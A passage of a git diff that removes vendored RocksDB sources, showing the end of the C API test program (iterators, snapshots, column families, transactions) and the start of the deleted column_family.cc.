-    rocksdb_iterator_t* base_iter = rocksdb_create_iterator(db, roptions);
-    rocksdb_writebatch_wi_t* wbi = rocksdb_writebatch_wi_create(0, 1);
-    rocksdb_writebatch_wi_put(wbi, "bar", 3, "b", 1);
-    rocksdb_writebatch_wi_delete(wbi, "foo", 3);
-    rocksdb_iterator_t* iter = rocksdb_writebatch_wi_create_iterator_with_base(wbi, base_iter);
-    CheckCondition(!rocksdb_iter_valid(iter));
-    rocksdb_iter_seek_to_first(iter);
-    CheckCondition(rocksdb_iter_valid(iter));
-    CheckIter(iter, "bar", "b");
-    rocksdb_iter_next(iter);
-    CheckIter(iter, "box", "c");
-    rocksdb_iter_prev(iter);
-    CheckIter(iter, "bar", "b");
-    rocksdb_iter_prev(iter);
-    CheckCondition(!rocksdb_iter_valid(iter));
-    rocksdb_iter_seek_to_last(iter);
-    CheckIter(iter, "box", "c");
-    rocksdb_iter_seek(iter, "b", 1);
-    CheckIter(iter, "bar", "b");
-    rocksdb_iter_seek_for_prev(iter, "c", 1);
-    CheckIter(iter, "box", "c");
-    rocksdb_iter_seek_for_prev(iter, "box", 3);
-    CheckIter(iter, "box", "c");
-    rocksdb_iter_get_error(iter, &err);
-    CheckNoError(err);
-    rocksdb_iter_destroy(iter);
-    rocksdb_writebatch_wi_destroy(wbi);
-  }
-
-  StartPhase("multiget");
-  {
-    const char* keys[3] = { "box", "foo", "notfound" };
-    const size_t keys_sizes[3] = { 3, 3, 8 };
-    char* vals[3];
-    size_t vals_sizes[3];
-    char* errs[3];
-    rocksdb_multi_get(db, roptions, 3, keys, keys_sizes, vals, vals_sizes, errs);
-
-    int i;
-    for (i = 0; i < 3; i++) {
-      CheckEqual(NULL, errs[i], 0);
-      switch (i) {
-      case 0:
-        CheckEqual("c", vals[i], vals_sizes[i]);
-        break;
-      case 1:
-        CheckEqual("hello", vals[i], vals_sizes[i]);
-        break;
-      case 2:
-        CheckEqual(NULL, vals[i], vals_sizes[i]);
-        break;
-      }
-      Free(&vals[i]);
-    }
-  }
-
-  StartPhase("pin_get");
-  {
-    CheckPinGet(db, roptions, "box", "c");
-    CheckPinGet(db, roptions, "foo", "hello");
-    CheckPinGet(db, roptions, "notfound", NULL);
-  }
-
-  StartPhase("approximate_sizes");
-  {
-    int i;
-    int n = 20000;
-    char keybuf[100];
-    char valbuf[100];
-    uint64_t sizes[2];
-    const char* start[2] = { "a", "k00000000000000010000" };
-    size_t start_len[2] = { 1, 21 };
-    const char* limit[2] = { "k00000000000000010000", "z" };
-    size_t limit_len[2] = { 21, 1 };
-    rocksdb_writeoptions_set_sync(woptions, 0);
-    for (i = 0; i < n; i++) {
-      snprintf(keybuf, sizeof(keybuf), "k%020d", i);
-      snprintf(valbuf, sizeof(valbuf), "v%020d", i);
-      rocksdb_put(db, woptions, keybuf, strlen(keybuf), valbuf, strlen(valbuf),
-                  &err);
-      CheckNoError(err);
-    }
-    rocksdb_approximate_sizes(db, 2, start, start_len, limit, limit_len, sizes);
-    CheckCondition(sizes[0] > 0);
-    CheckCondition(sizes[1] > 0);
-  }
-
-  StartPhase("property");
-  {
-    char* prop = rocksdb_property_value(db, "nosuchprop");
-    CheckCondition(prop == NULL);
-    prop = rocksdb_property_value(db, "rocksdb.stats");
-    CheckCondition(prop != NULL);
-    Free(&prop);
-  }
-
-  StartPhase("snapshot");
-  {
-    const rocksdb_snapshot_t* snap;
-    snap = rocksdb_create_snapshot(db);
-    rocksdb_delete(db, woptions, "foo", 3, &err);
-    CheckNoError(err);
-    rocksdb_readoptions_set_snapshot(roptions, snap);
-    CheckGet(db, roptions, "foo", "hello");
-    rocksdb_readoptions_set_snapshot(roptions, NULL);
-    CheckGet(db, roptions, "foo", NULL);
-    rocksdb_release_snapshot(db, snap);
-  }
-
-  StartPhase("repair");
-  {
-    // If we do not compact here, then the lazy deletion of
-    // files (https://reviews.facebook.net/D6123) would leave
-    // around deleted files and the repair process will find
-    // those files and put them back into the database.
-    rocksdb_compact_range(db, NULL, 0, NULL, 0);
-    rocksdb_close(db);
-    rocksdb_options_set_create_if_missing(options, 0);
-    rocksdb_options_set_error_if_exists(options, 0);
-    rocksdb_options_set_wal_recovery_mode(options, 2);
-    rocksdb_repair_db(options, dbname, &err);
-    CheckNoError(err);
-    db = rocksdb_open(options, dbname, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "foo", NULL);
-    CheckGet(db, roptions, "bar", NULL);
-    CheckGet(db, roptions, "box", "c");
-    rocksdb_options_set_create_if_missing(options, 1);
-    rocksdb_options_set_error_if_exists(options, 1);
-  }
-
-  StartPhase("filter");
-  for (run = 0; run < 2; run++) {
-    // First run uses custom filter, second run uses bloom filter
-    CheckNoError(err);
-    rocksdb_filterpolicy_t* policy;
-    if (run == 0) {
-      policy = rocksdb_filterpolicy_create(
-          NULL, FilterDestroy, FilterCreate, FilterKeyMatch, NULL, FilterName);
-    } else {
-      policy = rocksdb_filterpolicy_create_bloom(10);
-    }
-
-    rocksdb_block_based_options_set_filter_policy(table_options, policy);
-
-    // Create new database
-    rocksdb_close(db);
-    rocksdb_destroy_db(options, dbname, &err);
-    rocksdb_options_set_block_based_table_factory(options, table_options);
-    db = rocksdb_open(options, dbname, &err);
-    CheckNoError(err);
-    rocksdb_put(db, woptions, "foo", 3, "foovalue", 8, &err);
-    CheckNoError(err);
-    rocksdb_put(db, woptions, "bar", 3, "barvalue", 8, &err);
-    CheckNoError(err);
-    rocksdb_compact_range(db, NULL, 0, NULL, 0);
-
-    fake_filter_result = 1;
-    CheckGet(db, roptions, "foo", "foovalue");
-    CheckGet(db, roptions, "bar", "barvalue");
-    if (phase == 0) {
-      // Must not find value when custom filter returns false
-      fake_filter_result = 0;
-      CheckGet(db, roptions, "foo", NULL);
-      CheckGet(db, roptions, "bar", NULL);
-      fake_filter_result = 1;
-
-      CheckGet(db, roptions, "foo", "foovalue");
-      CheckGet(db, roptions, "bar", "barvalue");
-    }
-    // Reset the policy
-    rocksdb_block_based_options_set_filter_policy(table_options, NULL);
-    rocksdb_options_set_block_based_table_factory(options, table_options);
-  }
-
-  StartPhase("compaction_filter");
-  {
-    rocksdb_options_t* options_with_filter = rocksdb_options_create();
-    rocksdb_options_set_create_if_missing(options_with_filter, 1);
-    rocksdb_compactionfilter_t* cfilter;
-    cfilter = rocksdb_compactionfilter_create(NULL, CFilterDestroy,
-                                              CFilterFilter, CFilterName);
-    // Create new database
-    rocksdb_close(db);
-    rocksdb_destroy_db(options_with_filter, dbname, &err);
-    rocksdb_options_set_compaction_filter(options_with_filter, cfilter);
-    db = CheckCompaction(db, options_with_filter, roptions, woptions);
-
-    rocksdb_options_set_compaction_filter(options_with_filter, NULL);
-    rocksdb_compactionfilter_destroy(cfilter);
-    rocksdb_options_destroy(options_with_filter);
-  }
-
-  StartPhase("compaction_filter_factory");
-  {
-    rocksdb_options_t* options_with_filter_factory = rocksdb_options_create();
-    rocksdb_options_set_create_if_missing(options_with_filter_factory, 1);
-    rocksdb_compactionfilterfactory_t* factory;
-    factory = rocksdb_compactionfilterfactory_create(
-        NULL, CFilterFactoryDestroy, CFilterCreate, CFilterFactoryName);
-    // Create new database
-    rocksdb_close(db);
-    rocksdb_destroy_db(options_with_filter_factory, dbname, &err);
-    rocksdb_options_set_compaction_filter_factory(options_with_filter_factory,
-                                                  factory);
-    db = CheckCompaction(db, options_with_filter_factory, roptions, woptions);
-
-    rocksdb_options_set_compaction_filter_factory(
-        options_with_filter_factory, NULL);
-    rocksdb_options_destroy(options_with_filter_factory);
-  }
-
-  StartPhase("merge_operator");
-  {
-    rocksdb_mergeoperator_t* merge_operator;
-    merge_operator = rocksdb_mergeoperator_create(
-        NULL, MergeOperatorDestroy, MergeOperatorFullMerge,
-        MergeOperatorPartialMerge, NULL, MergeOperatorName);
-    // Create new database
-    rocksdb_close(db);
-    rocksdb_destroy_db(options, dbname, &err);
-    rocksdb_options_set_merge_operator(options, merge_operator);
-    db = rocksdb_open(options, dbname, &err);
-    CheckNoError(err);
-    rocksdb_put(db, woptions, "foo", 3, "foovalue", 8, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "foo", "foovalue");
-    rocksdb_merge(db, woptions, "foo", 3, "barvalue", 8, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "foo", "fake");
-
-    // Merge of a non-existing value
-    rocksdb_merge(db, woptions, "bar", 3, "barvalue", 8, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "bar", "fake");
-
-  }
-
-  StartPhase("columnfamilies");
-  {
-    rocksdb_close(db);
-    rocksdb_destroy_db(options, dbname, &err);
-    CheckNoError(err);
-
-    rocksdb_options_t* db_options = rocksdb_options_create();
-    rocksdb_options_set_create_if_missing(db_options, 1);
-    db = rocksdb_open(db_options, dbname, &err);
-    CheckNoError(err)
-    rocksdb_column_family_handle_t* cfh;
-    cfh = rocksdb_create_column_family(db, db_options, "cf1", &err);
-    rocksdb_column_family_handle_destroy(cfh);
-    CheckNoError(err);
-    rocksdb_close(db);
-
-    size_t cflen;
-    char** column_fams = rocksdb_list_column_families(db_options, dbname, &cflen, &err);
-    CheckNoError(err);
-    CheckEqual("default", column_fams[0], 7);
-    CheckEqual("cf1", column_fams[1], 3);
-    CheckCondition(cflen == 2);
-    rocksdb_list_column_families_destroy(column_fams, cflen);
-
-    rocksdb_options_t* cf_options = rocksdb_options_create();
-
-    const char* cf_names[2] = {"default", "cf1"};
-    const rocksdb_options_t* cf_opts[2] = {cf_options, cf_options};
-    rocksdb_column_family_handle_t* handles[2];
-    db = rocksdb_open_column_families(db_options, dbname, 2, cf_names, cf_opts, handles, &err);
-    CheckNoError(err);
-
-    rocksdb_put_cf(db, woptions, handles[1], "foo", 3, "hello", 5, &err);
-    CheckNoError(err);
-
-    CheckGetCF(db, roptions, handles[1], "foo", "hello");
-    CheckPinGetCF(db, roptions, handles[1], "foo", "hello");
-
-    rocksdb_delete_cf(db, woptions, handles[1], "foo", 3, &err);
-    CheckNoError(err);
-
-    CheckGetCF(db, roptions, handles[1], "foo", NULL);
-    CheckPinGetCF(db, roptions, handles[1], "foo", NULL);
-
-    rocksdb_writebatch_t* wb = rocksdb_writebatch_create();
-    rocksdb_writebatch_put_cf(wb, handles[1], "baz", 3, "a", 1);
-    rocksdb_writebatch_clear(wb);
-    rocksdb_writebatch_put_cf(wb, handles[1], "bar", 3, "b", 1);
-    rocksdb_writebatch_put_cf(wb, handles[1], "box", 3, "c", 1);
-    rocksdb_writebatch_delete_cf(wb, handles[1], "bar", 3);
-    rocksdb_write(db, woptions, wb, &err);
-    CheckNoError(err);
-    CheckGetCF(db, roptions, handles[1], "baz", NULL);
-    CheckGetCF(db, roptions, handles[1], "bar", NULL);
-    CheckGetCF(db, roptions, handles[1], "box", "c");
-    CheckPinGetCF(db, roptions, handles[1], "baz", NULL);
-    CheckPinGetCF(db, roptions, handles[1], "bar", NULL);
-    CheckPinGetCF(db, roptions, handles[1], "box", "c");
-    rocksdb_writebatch_destroy(wb);
-
-    const char* keys[3] = { "box", "box", "barfooxx" };
-    const rocksdb_column_family_handle_t* get_handles[3] = { handles[0], handles[1], handles[1] };
-    const size_t keys_sizes[3] = { 3, 3, 8 };
-    char* vals[3];
-    size_t vals_sizes[3];
-    char* errs[3];
-    rocksdb_multi_get_cf(db, roptions, get_handles, 3, keys, keys_sizes, vals, vals_sizes, errs);
-
-    int i;
-    for (i = 0; i < 3; i++) {
-      CheckEqual(NULL, errs[i], 0);
-      switch (i) {
-      case 0:
-        CheckEqual(NULL, vals[i], vals_sizes[i]); // wrong cf
-        break;
-      case 1:
-        CheckEqual("c", vals[i], vals_sizes[i]); // bingo
-        break;
-      case 2:
-        CheckEqual(NULL, vals[i], vals_sizes[i]); // normal not found
-        break;
-      }
-      Free(&vals[i]);
-    }
-
-    rocksdb_iterator_t* iter = rocksdb_create_iterator_cf(db, roptions, handles[1]);
-    CheckCondition(!rocksdb_iter_valid(iter));
-    rocksdb_iter_seek_to_first(iter);
-    CheckCondition(rocksdb_iter_valid(iter));
-
-    for (i = 0; rocksdb_iter_valid(iter) != 0; rocksdb_iter_next(iter)) {
-      i++;
-    }
-    CheckCondition(i == 1);
-    rocksdb_iter_get_error(iter, &err);
-    CheckNoError(err);
-    rocksdb_iter_destroy(iter);
-
-    rocksdb_column_family_handle_t* iters_cf_handles[2] = { handles[0], handles[1] };
-    rocksdb_iterator_t* iters_handles[2];
-    rocksdb_create_iterators(db, roptions, iters_cf_handles, iters_handles, 2, &err);
-    CheckNoError(err);
-
-    iter = iters_handles[0];
-    CheckCondition(!rocksdb_iter_valid(iter));
-    rocksdb_iter_seek_to_first(iter);
-    CheckCondition(!rocksdb_iter_valid(iter));
-    rocksdb_iter_destroy(iter);
-
-    iter = iters_handles[1];
-    CheckCondition(!rocksdb_iter_valid(iter));
-    rocksdb_iter_seek_to_first(iter);
-    CheckCondition(rocksdb_iter_valid(iter));
-
-    for (i = 0; rocksdb_iter_valid(iter) != 0; rocksdb_iter_next(iter)) {
-      i++;
-    }
-    CheckCondition(i == 1);
-    rocksdb_iter_get_error(iter, &err);
-    CheckNoError(err);
-    rocksdb_iter_destroy(iter);
-
-    rocksdb_drop_column_family(db, handles[1], &err);
-    CheckNoError(err);
-    for (i = 0; i < 2; i++) {
-      rocksdb_column_family_handle_destroy(handles[i]);
-    }
-    rocksdb_close(db);
-    rocksdb_destroy_db(options, dbname, &err);
-    rocksdb_options_destroy(db_options);
-    rocksdb_options_destroy(cf_options);
-  }
-
-  StartPhase("prefix");
-  {
-    // Create new database
-    rocksdb_options_set_allow_mmap_reads(options, 1);
-    rocksdb_options_set_prefix_extractor(options, rocksdb_slicetransform_create_fixed_prefix(3));
-    rocksdb_options_set_hash_skip_list_rep(options, 5000, 4, 4);
-    rocksdb_options_set_plain_table_factory(options, 4, 10, 0.75, 16);
-    rocksdb_options_set_allow_concurrent_memtable_write(options, 0);
-
-    db = rocksdb_open(options, dbname, &err);
-    CheckNoError(err);
-
-    rocksdb_put(db, woptions, "foo1", 4, "foo", 3, &err);
-    CheckNoError(err);
-    rocksdb_put(db, woptions, "foo2", 4, "foo", 3, &err);
-    CheckNoError(err);
-    rocksdb_put(db, woptions, "foo3", 4, "foo", 3, &err);
-    CheckNoError(err);
-    rocksdb_put(db, woptions, "bar1", 4, "bar", 3, &err);
-    CheckNoError(err);
-    rocksdb_put(db, woptions, "bar2", 4, "bar", 3, &err);
-    CheckNoError(err);
-    rocksdb_put(db, woptions, "bar3", 4, "bar", 3, &err);
-    CheckNoError(err);
-
-    rocksdb_iterator_t* iter = rocksdb_create_iterator(db, roptions);
-    CheckCondition(!rocksdb_iter_valid(iter));
-
-    rocksdb_iter_seek(iter, "bar", 3);
-    rocksdb_iter_get_error(iter, &err);
-    CheckNoError(err);
-    CheckCondition(rocksdb_iter_valid(iter));
-
-    CheckIter(iter, "bar1", "bar");
-    rocksdb_iter_next(iter);
-    CheckIter(iter, "bar2", "bar");
-    rocksdb_iter_next(iter);
-    CheckIter(iter, "bar3", "bar");
-    rocksdb_iter_get_error(iter, &err);
-    CheckNoError(err);
-    rocksdb_iter_destroy(iter);
-
-    rocksdb_readoptions_set_total_order_seek(roptions, 1);
-    iter = rocksdb_create_iterator(db, roptions);
-    CheckCondition(!rocksdb_iter_valid(iter));
-
-    rocksdb_iter_seek(iter, "ba", 2);
-    rocksdb_iter_get_error(iter, &err);
-    CheckNoError(err);
-    CheckCondition(rocksdb_iter_valid(iter));
-    CheckIter(iter, "bar1", "bar");
-
-    rocksdb_iter_destroy(iter);
-    rocksdb_readoptions_set_total_order_seek(roptions, 0);
-
-    rocksdb_close(db);
-    rocksdb_destroy_db(options, dbname, &err);
-  }
-
-  StartPhase("cuckoo_options");
-  {
-    rocksdb_cuckoo_table_options_t* cuckoo_options;
-    cuckoo_options = rocksdb_cuckoo_options_create();
-    rocksdb_cuckoo_options_set_hash_ratio(cuckoo_options, 0.5);
-    rocksdb_cuckoo_options_set_max_search_depth(cuckoo_options, 200);
-    rocksdb_cuckoo_options_set_cuckoo_block_size(cuckoo_options, 10);
-    rocksdb_cuckoo_options_set_identity_as_first_hash(cuckoo_options, 1);
-    rocksdb_cuckoo_options_set_use_module_hash(cuckoo_options, 0);
-    rocksdb_options_set_cuckoo_table_factory(options, cuckoo_options);
-
-    db = rocksdb_open(options, dbname, &err);
-    CheckNoError(err);
-
-    rocksdb_cuckoo_options_destroy(cuckoo_options);
-  }
-
-  StartPhase("iterate_upper_bound");
-  {
-    // Create new empty database
-    rocksdb_close(db);
-    rocksdb_destroy_db(options, dbname, &err);
-    CheckNoError(err);
-
-    rocksdb_options_set_prefix_extractor(options, NULL);
-    db = rocksdb_open(options, dbname, &err);
-    CheckNoError(err);
-
-    rocksdb_put(db, woptions, "a",    1, "0",    1, &err); CheckNoError(err);
-    rocksdb_put(db, woptions, "foo",  3, "bar",  3, &err); CheckNoError(err);
-    rocksdb_put(db, woptions, "foo1", 4, "bar1", 4, &err); CheckNoError(err);
-    rocksdb_put(db, woptions, "g1",   2, "0",    1, &err); CheckNoError(err);
-
-    // testing basic case with no iterate_upper_bound and no prefix_extractor
-    {
-       rocksdb_readoptions_set_iterate_upper_bound(roptions, NULL, 0);
-       rocksdb_iterator_t* iter = rocksdb_create_iterator(db, roptions);
-
-       rocksdb_iter_seek(iter, "foo", 3);
-       CheckCondition(rocksdb_iter_valid(iter));
-       CheckIter(iter, "foo", "bar");
-
-       rocksdb_iter_next(iter);
-       CheckCondition(rocksdb_iter_valid(iter));
-       CheckIter(iter, "foo1", "bar1");
-
-       rocksdb_iter_next(iter);
-       CheckCondition(rocksdb_iter_valid(iter));
-       CheckIter(iter, "g1", "0");
-
-       rocksdb_iter_destroy(iter);
-    }
-
-    // testing iterate_upper_bound and forward iterator
-    // to make sure it stops at bound
-    {
-       // iterate_upper_bound points beyond the last expected entry
-       rocksdb_readoptions_set_iterate_upper_bound(roptions, "foo2", 4);
-
-       rocksdb_iterator_t* iter = rocksdb_create_iterator(db, roptions);
-
-       rocksdb_iter_seek(iter, "foo", 3);
-       CheckCondition(rocksdb_iter_valid(iter));
-       CheckIter(iter, "foo", "bar");
-
-       rocksdb_iter_next(iter);
-       CheckCondition(rocksdb_iter_valid(iter));
-       CheckIter(iter, "foo1", "bar1");
-
-       rocksdb_iter_next(iter);
-       // should stop here...
-       CheckCondition(!rocksdb_iter_valid(iter));
-
-       rocksdb_iter_destroy(iter);
-    }
-  }
-
-  StartPhase("transactions");
-  {
-    rocksdb_close(db);
-    rocksdb_destroy_db(options, dbname, &err);
-    CheckNoError(err);
-
-    // open a TransactionDB
-    txn_db_options = rocksdb_transactiondb_options_create();
-    txn_options = rocksdb_transaction_options_create();
-    rocksdb_options_set_create_if_missing(options, 1);
-    txn_db = rocksdb_transactiondb_open(options, txn_db_options, dbname, &err);
-    CheckNoError(err);
-
-    // put outside a transaction
-    rocksdb_transactiondb_put(txn_db, woptions, "foo", 3, "hello", 5, &err);
-    CheckNoError(err);
-    CheckTxnDBGet(txn_db, roptions, "foo", "hello");
-
-    // delete from outside transaction
-    rocksdb_transactiondb_delete(txn_db, woptions, "foo", 3, &err);
-    CheckNoError(err);
-    CheckTxnDBGet(txn_db, roptions, "foo", NULL);
-
-    // write batch into TransactionDB
-    rocksdb_writebatch_t* wb = rocksdb_writebatch_create();
-    rocksdb_writebatch_put(wb, "foo", 3, "a", 1);
-    rocksdb_writebatch_clear(wb);
-    rocksdb_writebatch_put(wb, "bar", 3, "b", 1);
-    rocksdb_writebatch_put(wb, "box", 3, "c", 1);
-    rocksdb_writebatch_delete(wb, "bar", 3);
-    rocksdb_transactiondb_write(txn_db, woptions, wb, &err);
-    rocksdb_writebatch_destroy(wb);
-    CheckTxnDBGet(txn_db, roptions, "box", "c");
-    CheckNoError(err);
-
-    // begin a transaction
-    txn = rocksdb_transaction_begin(txn_db, woptions, txn_options, NULL);
-    // put
-    rocksdb_transaction_put(txn, "foo", 3, "hello", 5, &err);
-    CheckNoError(err);
-    CheckTxnGet(txn, roptions, "foo", "hello");
-    // delete
-    rocksdb_transaction_delete(txn, "foo", 3, &err);
-    CheckNoError(err);
-    CheckTxnGet(txn, roptions, "foo", NULL);
-
-    rocksdb_transaction_put(txn, "foo", 3, "hello", 5, &err);
-    CheckNoError(err);
-
-    // read from outside transaction, before commit
-    CheckTxnDBGet(txn_db, roptions, "foo", NULL);
-
-    // commit
-    rocksdb_transaction_commit(txn, &err);
-    CheckNoError(err);
-
-    // read from outside transaction, after commit
-    CheckTxnDBGet(txn_db, roptions, "foo", "hello");
-
-    // reuse old transaction
-    txn = rocksdb_transaction_begin(txn_db, woptions, txn_options, txn);
-
-    // snapshot
-    const rocksdb_snapshot_t* snapshot;
-    snapshot = rocksdb_transactiondb_create_snapshot(txn_db);
-    rocksdb_readoptions_set_snapshot(roptions, snapshot);
-  
-    rocksdb_transactiondb_put(txn_db, woptions, "foo", 3, "hey", 3,  &err);
-    CheckNoError(err);
-
-    CheckTxnDBGet(txn_db, roptions, "foo", "hello");
-    rocksdb_readoptions_set_snapshot(roptions, NULL);
-    rocksdb_transactiondb_release_snapshot(txn_db, snapshot);
-    CheckTxnDBGet(txn_db, roptions, "foo", "hey");
-
-    // iterate
-    rocksdb_transaction_put(txn, "bar", 3, "hi", 2, &err);
-    rocksdb_iterator_t* iter = rocksdb_transaction_create_iterator(txn, roptions);
-    CheckCondition(!rocksdb_iter_valid(iter));
-    rocksdb_iter_seek_to_first(iter);
-    CheckCondition(rocksdb_iter_valid(iter));
-    CheckIter(iter, "bar", "hi");
-    rocksdb_iter_get_error(iter, &err);
-    CheckNoError(err);
-    rocksdb_iter_destroy(iter);
-
-    // rollback
-    rocksdb_transaction_rollback(txn, &err);
-    CheckNoError(err);
-    CheckTxnDBGet(txn_db, roptions, "bar", NULL);
-
-    // Column families.
-    rocksdb_column_family_handle_t* cfh;
-    cfh = rocksdb_transactiondb_create_column_family(txn_db, options,
-                                                     "txn_db_cf", &err);
-    CheckNoError(err);
-
-    rocksdb_transactiondb_put_cf(txn_db, woptions, cfh, "cf_foo", 6, "cf_hello",
-                                 8, &err);
-    CheckNoError(err);
-    CheckTxnDBGetCF(txn_db, roptions, cfh, "cf_foo", "cf_hello");
-
-    rocksdb_transactiondb_delete_cf(txn_db, woptions, cfh, "cf_foo", 6, &err);
-    CheckNoError(err);
-    CheckTxnDBGetCF(txn_db, roptions, cfh, "cf_foo", NULL);
-
-    rocksdb_column_family_handle_destroy(cfh);
-
-    // close and destroy
-    rocksdb_transaction_destroy(txn);
-    rocksdb_transactiondb_close(txn_db);
-    rocksdb_destroy_db(options, dbname, &err);
-    CheckNoError(err);
-    rocksdb_transaction_options_destroy(txn_options);
-    rocksdb_transactiondb_options_destroy(txn_db_options);
-  }
-
-  // Simple sanity check that setting memtable rep works.
-  StartPhase("memtable_reps");
-  {
-    // Create database with vector memtable.
-    rocksdb_options_set_memtable_vector_rep(options);
-    db = rocksdb_open(options, dbname, &err);
-    CheckNoError(err);
-
-    // Create database with hash skiplist memtable.
-    rocksdb_close(db);
-    rocksdb_destroy_db(options, dbname, &err);
-    CheckNoError(err);
-
-    rocksdb_options_set_hash_skip_list_rep(options, 5000, 4, 4);
-    db = rocksdb_open(options, dbname, &err);
-    CheckNoError(err);
-  }
-
-  // Simple sanity check that options setting db_paths work.
-  StartPhase("open_db_paths");
-  {
-    rocksdb_close(db);
-    rocksdb_destroy_db(options, dbname, &err);
-
-    const rocksdb_dbpath_t* paths[1] = {dbpath};
-    rocksdb_options_set_db_paths(options, paths, 1);
-    db = rocksdb_open(options, dbname, &err);
-    CheckNoError(err);
-  }
-  
-  StartPhase("cleanup");
-  rocksdb_close(db);
-  rocksdb_options_destroy(options);
-  rocksdb_block_based_options_destroy(table_options);
-  rocksdb_readoptions_destroy(roptions);
-  rocksdb_writeoptions_destroy(woptions);
-  rocksdb_compactoptions_destroy(coptions);
-  rocksdb_cache_destroy(cache);
-  rocksdb_comparator_destroy(cmp);
-  rocksdb_dbpath_destroy(dbpath);
-  rocksdb_env_destroy(env);
-
-  fprintf(stderr, "PASS\n");
-  return 0;
-}
-
-#else
-
-int main() {
-  fprintf(stderr, "SKIPPED\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/column_family.cc b/thirdparty/rocksdb/db/column_family.cc
deleted file mode 100644
index 6fd0787..0000000
--- a/thirdparty/rocksdb/db/column_family.cc
+++ /dev/null
@@ -1,1144 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/column_family.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <vector>
-#include <string>
-#include <algorithm>
-#include <limits>
-
-#include "db/compaction_picker.h"
-#include "db/compaction_picker_universal.h"
-#include "db/db_impl.h"
-#include "db/internal_stats.h"
-#include "db/job_context.h"
-#include "db/table_properties_collector.h"
-#include "db/version_set.h"
-#include "db/write_controller.h"
-#include "memtable/hash_skiplist_rep.h"
-#include "monitoring/thread_status_util.h"
-#include "options/options_helper.h"
-#include "table/block_based_table_factory.h"
-#include "util/autovector.h"
-#include "util/compression.h"
-
-namespace rocksdb {
-
-ColumnFamilyHandleImpl::ColumnFamilyHandleImpl(
-    ColumnFamilyData* column_family_data, DBImpl* db, InstrumentedMutex* mutex)
-    : cfd_(column_family_data), db_(db), mutex_(mutex) {
-  if (cfd_ != nullptr) {
-    cfd_->Ref();
-  }
-}
-
-ColumnFamilyHandleImpl::~ColumnFamilyHandleImpl() {
-  if (cfd_ != nullptr) {
-#ifndef ROCKSDB_LITE
-    for (auto& listener : cfd_->ioptions()->listeners) {
-      listener->OnColumnFamilyHandleDeletionStarted(this);
-    }
-#endif  // ROCKSDB_LITE
-    // Job id == 0 means that this is not our background process, but rather
-    // user thread
-    JobContext job_context(0);
-    mutex_->Lock();
-    if (cfd_->Unref()) {
-      delete cfd_;
-    }
-    db_->FindObsoleteFiles(&job_context, false, true);
-    mutex_->Unlock();
-    if (job_context.HaveSomethingToDelete()) {
-      db_->PurgeObsoleteFiles(job_context);
-    }
-    job_context.Clean();
-  }
-}
-
-uint32_t ColumnFamilyHandleImpl::GetID() const { return cfd()->GetID(); }
-
-const std::string& ColumnFamilyHandleImpl::GetName() const {
-  return cfd()->GetName();
-}
-
-Status ColumnFamilyHandleImpl::GetDescriptor(ColumnFamilyDescriptor* desc) {
-#ifndef ROCKSDB_LITE
-  // accessing mutable cf-options requires db mutex.
-  InstrumentedMutexLock l(mutex_);
-  *desc = ColumnFamilyDescriptor(cfd()->GetName(), cfd()->GetLatestCFOptions());
-  return Status::OK();
-#else
-  return Status::NotSupported();
-#endif  // !ROCKSDB_LITE
-}
-
-const Comparator* ColumnFamilyHandleImpl::GetComparator() const {
-  return cfd()->user_comparator();
-}
-
-void GetIntTblPropCollectorFactory(
-    const ImmutableCFOptions& ioptions,
-    std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-        int_tbl_prop_collector_factories) {
-  auto& collector_factories = ioptions.table_properties_collector_factories;
-  for (size_t i = 0; i < ioptions.table_properties_collector_factories.size();
-       ++i) {
-    assert(collector_factories[i]);
-    int_tbl_prop_collector_factories->emplace_back(
-        new UserKeyTablePropertiesCollectorFactory(collector_factories[i]));
-  }
-  // Add collector to collect internal key statistics
-  int_tbl_prop_collector_factories->emplace_back(
-      new InternalKeyPropertiesCollectorFactory);
-}
-
-Status CheckCompressionSupported(const ColumnFamilyOptions& cf_options) {
-  if (!cf_options.compression_per_level.empty()) {
-    for (size_t level = 0; level < cf_options.compression_per_level.size();
-         ++level) {
-      if (!CompressionTypeSupported(cf_options.compression_per_level[level])) {
-        return Status::InvalidArgument(
-            "Compression type " +
-            CompressionTypeToString(cf_options.compression_per_level[level]) +
-            " is not linked with the binary.");
-      }
-    }
-  } else {
-    if (!CompressionTypeSupported(cf_options.compression)) {
-      return Status::InvalidArgument(
-          "Compression type " +
-          CompressionTypeToString(cf_options.compression) +
-          " is not linked with the binary.");
-    }
-  }
-  return Status::OK();
-}
-
-Status CheckConcurrentWritesSupported(const ColumnFamilyOptions& cf_options) {
-  if (cf_options.inplace_update_support) {
-    return Status::InvalidArgument(
-        "In-place memtable updates (inplace_update_support) is not compatible "
-        "with concurrent writes (allow_concurrent_memtable_write)");
-  }
-  if (!cf_options.memtable_factory->IsInsertConcurrentlySupported()) {
-    return Status::InvalidArgument(
-        "Memtable doesn't concurrent writes (allow_concurrent_memtable_write)");
-  }
-  return Status::OK();
-}
-
-ColumnFamilyOptions SanitizeOptions(const ImmutableDBOptions& db_options,
-                                    const ColumnFamilyOptions& src) {
-  ColumnFamilyOptions result = src;
-  size_t clamp_max = std::conditional<
-      sizeof(size_t) == 4, std::integral_constant<size_t, 0xffffffff>,
-      std::integral_constant<uint64_t, 64ull << 30>>::type::value;
-  ClipToRange(&result.write_buffer_size, ((size_t)64) << 10, clamp_max);
-  // if user sets arena_block_size, we trust user to use this value. Otherwise,
-  // calculate a proper value from writer_buffer_size;
-  if (result.arena_block_size <= 0) {
-    result.arena_block_size = result.write_buffer_size / 8;
-
-    // Align up to 4k
-    const size_t align = 4 * 1024;
-    result.arena_block_size =
-        ((result.arena_block_size + align - 1) / align) * align;
-  }
-  result.min_write_buffer_number_to_merge =
